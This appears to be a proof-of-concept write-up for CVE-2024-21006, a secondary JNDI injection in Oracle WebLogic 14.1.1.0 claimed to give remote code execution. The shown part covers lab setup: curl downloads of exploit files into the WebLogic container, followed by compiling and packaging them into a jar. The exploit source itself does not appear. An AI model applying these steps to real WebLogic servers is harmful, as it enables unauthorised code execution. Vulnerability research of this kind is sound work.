WebLogic - CVE-2024-21006
CVE-2024-21006 reveals a new WebLogic attack method: secondary JNDI injection, that is, triggering JNDI injection during the JNDI injection process, thereby completing RCE.
Project is based on the findings of pwnull and code from momika223.
Proof-of-Concept
Oracle 14.1.1.0
apt :: ~ » docker container ls
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
fa9822b7dfd5 container-registry.oracle.com/middleware/weblogic:14.1.1.0 "/u01/oracle/createA…" 23 hours ago Up 2 hours 0.0.0.0:7001->7001/tcp, :::7001->7001/tcp, 0.0.0.0:9002->9002/tcp, :::9002->9002/tcp 14110-weblogicPrepare the environment by uploading MainClass.java and META-INF/MANIFEST.MF to the WebLogic container.
[oracle@14110-weblogic lib]$ curl -OL 172.17.0.1/MainClass.java
[oracle@14110-weblogic lib]$ curl -OL 172.17.0.1/MANIFEST.MF
[oracle@14110-weblogic lib]$ mkdir META-INF
[oracle@14110-weblogic lib]$ mv MANIFEST.MF META-INF/Compile the code.
[oracle@14110-weblogic lib]$ javac -cp /u01/oracle/wlserver/server/lib/weblogic.jar MainClass.java
[oracle@14110-weblogic lib]$ ls -al | grep MainClass
-rw-rw-r-- 1 oracle oracle 2033 Oct 10 08:03 MainClass$1.class
-rw-rw-r-- 1 oracle oracle 1386 Oct 10 08:03 MainClass.class
-rw-rw-r-- 1 oracle oracle 3717 Oct 10 08:01 MainClass.java
[oracle@14110-weblogic lib]$ jar cvfm cve-2024-21006.jar META-INF/MANIFEST.MF *.class
added manifest
adding: MainClass$1.class(in = 2033) (out= 671)(deflated 66%)
adding: MainClass.class(in = 2161) (out= 1100)(deflated 49%)
Source code
Last updated
Was this helpful?